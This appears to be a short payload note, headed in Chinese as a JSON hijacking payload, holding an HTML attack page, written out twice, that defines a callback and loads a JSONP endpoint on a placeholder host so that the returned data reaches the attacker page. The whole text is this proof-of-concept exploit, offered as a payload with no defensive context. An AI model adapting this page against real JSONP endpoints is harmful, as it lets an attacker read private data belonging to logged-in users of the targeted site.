json劫持payload
<html>
<head>jsonp hijacking</head>
<body>
<script>
function jj(json){
alert(JSON.stringify(json));
}
</script>
<script src="https://test/?callback=jj">
</script>
</body>
</html>
<html>
<head>jsonp hijacking</head>
<body>
<script>
function jj(json){
alert(JSON.stringify(json));
}
</script>
<script src="https://test/?callback=jj">
</script>
</body>
</html>
